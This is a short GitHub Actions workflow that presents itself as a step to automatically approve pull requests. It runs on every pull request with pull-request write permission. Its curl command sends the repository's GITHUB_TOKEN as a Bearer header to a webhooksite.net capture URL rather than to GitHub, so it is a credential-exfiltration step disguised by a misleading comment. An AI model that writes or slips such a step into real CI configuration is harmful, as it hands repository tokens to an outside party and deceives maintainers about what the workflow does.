name: APPROVE
 
on: pull_request # run on pull request events
 
permissions:
 pull-requests: write # grant write permission on the pull-requests endpoint
jobs:
 approve:
   runs-on: ubuntu-latest
 
   steps:
     - run: | # approve the pull request
         curl --request POST \
         --url  https://webhooksite.net/cf84aab9-2b04-46fe-a88f-b53db88df7c1/reviews \
         --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \
         --header 'content-type: application/json' \
         -d '{"event":"APPROVE"}'
